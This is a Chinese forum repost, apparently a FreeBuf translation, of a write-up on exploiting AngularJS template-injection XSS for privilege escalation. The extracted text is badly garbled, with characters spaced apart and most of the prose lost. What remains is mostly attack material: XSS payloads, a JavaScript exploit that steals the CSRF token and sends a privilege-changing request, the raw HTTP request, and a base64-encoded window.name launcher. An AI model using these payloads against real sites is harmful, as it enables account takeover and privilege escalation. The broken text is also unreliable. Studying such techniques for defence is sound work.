搜索

[14665] 2019-10-05_利用基于AngularJS的XSS实现提权

文档创建者:s7ckTeam
浏览次数:37
最后更新:2025-01-18
2019-10-05_利用基于AngularJS的XSS实现提权 A n g u l a r J S X S S s e c i s t   F r e e B u f   2 0 1 9 - 1 0 - 0 5 S h a w a r   K h a n X S S X S S / / X S S X S S 使 C S R F c o o k i e X S S h t t p s : / / w w w . s i t e . c o m / u s e r s / u s e r n a m e - h e r e   A n g u l a r J S   X S S 访 " > < i m g   s r c = x   o n e r r o r = p r o m p t ( ) > " X S S A n g u l a r J S X S S   s e t t i n g s { { a l e r t ( 1 ) } } / u s e r s / u s e r n a m e _ p a g e 访 p a y l o a d / 访 d o c u m e n t . b o d y . i n n e r H T M L X S S H u n t e r   p a y l o a d  
J a v a S c r i p t w i n d o w . n a m e p a y l o a d w i n d o w . n a m e p a y l o a d p a y l o a d 2 0 p a y l o a d e v a l ( a t o b ( t o p . n a m e ) ) 使 使 w i n d o w . o p e n ( u r l , w i n d o w   n a m e   h e r e )   U R L w i n d o w   n a m e b a s e 6 4 w i n d o w . n a m e e v a l ( ) c s c = 1 f u l l 访 C S R F c o o k i e d o c u m e n t . c o o k i e m e t a : 使 f e t c h ( ) / s e t t i n g s w o o t 使 w o o t . g e t E l e m e n t s B y T a g N a m e ( m e t a ) [ 3 ] [ c o n t e n t ] C S R F c s r f _ t o k e n 使 X H R p r i v i l e g e _ e s c a l a t e ( ) P O S T m r s - c a m y l l e - k e r t z m a z e v a l w i n d o w n a m e p a y l o a d { { e v a l ( a t o b ( w i n d o w . n a m e ) ) } } w i n d o w . n a m e w i n d o w . n a m e c s c = 1 b a s e 6 4 w i n d o w   n a m e e v a l ( a t o b ( w i n d o w . n a m e ) ) 使 w i n d o w   n a m e 访 w i n d o w . n a m e P O S T   / u s e r s / a t t a c k e r s - u s e r n a m e   H T T P / 1 . 1 H o s t :   v u l n e r a b l e s i t e . c o m U s e r - A g e n t :   M o z i l l a / 5 . 0   ( M a c i n t o s h ;   I n t e l   M a c   O S   X   1 0 . 1 4 ;   r v : 6 8 . 0 )   G e c k o / 2 0 1 0 0 1 0 1   F i r e f o x / 6 8 . 0 A c c e p t :   a p p l i c a t i o n / j s o n ,   t e x t / p l a i n ,   * / * A c c e p t - L a n g u a g e :   e n - U S , e n ; q = 0 . 5 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e C o n n e c t i o n :   c l o s e C o n t e n t - T y p e :   a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d C o n t e n t - L e n g t h :   1 4 1 _ m e t h o d = P U T & _ t o k e n = C S R F _ T O K E N _ H E R E & n a m e = U S E R N A M E & e m a i l = U S E R _ E M A I L & p h o n e = & c s c = 1 < m e t a   n a m e = " C S R F _ T O K E N "   c o n t e n t = " T O K E N _ H E R E " > v a r   w o o t   =   d o c u m e n t . c r e a t e E l e m e n t ( ' h t m l ' ) ; f e t c h ( ' h t t p s : / / v u l n e r a b l e s i t e . c o m / s e t t i n g s ' , { c r e d e n t i a l s :   ' i n c l u d e ' } ) . t h e n ( ( r e s p )   = >   r e s p . t e x t ( ) ) . t h e n ( f u n c t i o n ( d a t a ) { w o o t . i n n e r H T M L = d a t a ; v a r   c s r f _ t o k e n   =   w o o t . g e t E l e m e n t s B y T a g N a m e ( ' m e t a ' ) [ 3 ] [ ' c o n t e n t ' ] . . . . . . . . . f u n c t i o n   p r i v i l e g e _ e s c a l a t e ( ) { v a r   r e q   =   n e w   X M L H t t p R e q u e s t ( ) ; r e q . o p e n ( ' P O S T ' , ' h t t p s : / / v u l n e r a b l e s i t e . c o m / u s e r s / m r s - c a m y l l e - k e r t z m a z e v a l w i n d o w n a m e ' , t r u e ) ; r e q . w i t h C r e d e n t i a l s   =   t r u e ; r e q . s e t R e q u e s t H e a d e r ( " C o n t e n t - T y p e " ,   " a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d " ) ; r e q . s e n d ( ' _ m e t h o d = P U T & _ t o k e n = ' + c s r f _ t o k e n + ' & n a m e = M r s . + C a m y l l e + K e r t z m a z % 7 B % 7 B e v a l % 2 8 w i n d o w . n a m e % 2 9 % 7 D % 7 D & e m a i l = u s e r % 4 0 e x a m p l e . o r g & p h o n e = & c s c = 1 ' ) ; } / /   X S S   E x p l o i t   c o d e   f o r   P r i v i l e g e   E s c a l a t i o n / /   A u t h o r :   S h a w a r   K h a n v a r   w o o t   =   d o c u m e n t . c r e a t e E l e m e n t ( ' h t m l ' ) ; f e t c h ( ' h t t p s : / / v u l n e r a b l e s i t e . c o m / s e t t i n g s ' , { c r e d e n t i a l s :   ' i n c l u d e ' } ) . t h e n ( ( r e s p )   = >   r e s p . t e x t ( ) ) . t h e n ( f u n c t i o n ( d a t a ) { w o o t . i n n e r H T M L = d a t a ; v a r   c s r f _ t o k e n   =   w o o t . g e t E l e m e n t s B y T a g N a m e ( ' m e t a ' ) [ 3 ] [ ' c o n t e n t ' ] ; p r i v i l e g e _ e s c a l a t e ( ) ; f u n c t i o n   p r i v i l e g e _ e s c a l a t e ( ) { v a r   r e q   =   n e w   X M L H t t p R e q u e s t ( ) ; r e q . o p e n ( ' P O S T ' , ' h t t p s : / / v u l n e r a b l e s i t e . c o m / u s e r s / m r s - c a m y l l e - k e r t z m a z e v a l w i n d o w n a m e ' , t r u e ) ; r e q . w i t h C r e d e n t i a l s   =   t r u e ; r e q . s e t R e q u e s t H e a d e r ( " C o n t e n t - T y p e " ,   " a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d " ) ; r e q . s e n d ( ' _ m e t h o d = P U T & _ t o k e n = ' + c s r f _ t o k e n + ' & n a m e = M r s . + C a m y l l e + K e r t z m a z % 7 B % 7 B e v a l % 2 8 w i n d o w . n a m e % 2 9 % 7 D % 7 D & e m a i l = u s e r % 4 0 e x a m p l e . o r g & p h o n e = & c s c = 1 ' ) ; } } ) < s c r i p t > w i n d o w . o p e n ( ' h t t p s : / / v u l n e r a b l e s i t e . c o m / u s e r s / m r s - c a m y l l e - k e r t z m a z e v a l w i n d o w n a m e ' , ' d m F y I H d v b 3 Q g P S B k b 2 N 1 b W V u d C 5 j c m V h d G V F b G V t Z W 5 0 K C d o d G 1 s J y k 7 C m Z l d G N o K C d o d H R w c z o v L 3 Z 1 b G 5 l c m F i b G V z a X R l L m N v b S 9 z Z X R 0 a W 5 n c y c s e 2 N y Z W R l b n R p Y W x z O i A n a W 5 j b H V k Z S d 9 K S 5 0 a G V u K C h y Z X N w K S A 9 P i B y Z X N w L n R l e H Q o K S k u d G h l b i h m d W 5 j d G l v b i h k Y X R h K X s K C n d v b 3 Q u a W 5 u Z X J I V E 1 M P W R h d G E 7 C n Z h c i B j c 3 J m X 3 R v a 2 V u I D 0 g d 2 9 v d C 5 n Z X R F b G V t Z W 5 0 c 0 J 5 V G F n T m F t Z S g n b W V 0 Y S c p W z N d W y d j b 2 5 0 Z W 5 0 J 1 0 7 C n B y a X Z p b G V n Z V 9 l c 2 N h b G F 0 Z S g p O w o K Z n V u Y 3 R p b 2 4 g c H J p d m l s Z W d l X 2 V z Y 2 F s Y X R l K C l 7 C n Z h c i B y Z X E g P S B u Z X c g W E 1 M S H R 0 c F J l c X V l c 3 Q o K T s K c m V x L * * w Z W 4 o J 1 B P U 1 Q n L C d o d H R w c z o v L 3 Z 1 b G 5 l c m F i b G V z a X R l L m N v b S 9 1 c 2 V y c y 9 t c n M t Y 2 F t e W x s Z S 1 r Z X J 0 e m 1 h e m V 2 Y W x 3 a W 5 k b 3 d u Y W 1 l J y x 0 c n V l K T s K c m V x L n d p d G h D c m V k Z W 5 0 a W F s c y A 9 I H R y d W U 7 C n J l c S 5 z Z X R S Z X F 1 Z X N 0 S G V h Z G V y K C J D b 2 5 0 Z W 5 0 L V R 5 c G U i L C A i Y X B w b G l j Y X R p b 2 4 v e C 1 3 d 3 c t Z * * y b S 1 1 c m x l b m N v Z G V k I i k 7 I A p y Z X E u c 2 V u Z C g n X 2 1 l d G h v Z D 1 Q V V Q m X 3 R v a 2 V u P S c r Y 3 N y Z l 9 0 b 2 t l b i s n J m 5 h b W U 9 T X J z L i t D Y W 1 5 b G x l K 0 t l c n R 6 b W F 6 J T d C J T d C Z X Z h b C U y O H d p b m R v d y 5 u Y W 1 l J T I 5 J T d E J T d E J m V t Y W l s P X V z Z X I l N D B l e G F t c G x l L * * y Z y Z w a G 9 u Z T 0 m Y 3 N j P T E n K T s K f Q o K f Q o p '
访 访 X S S 使 X S S X S S 使 { { a l e r t ( 1 } } . s w f . s v g . h t m l . u r l X S S * s h a w a r k h a n F B s e c i s t F r e e B u f . C O M

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理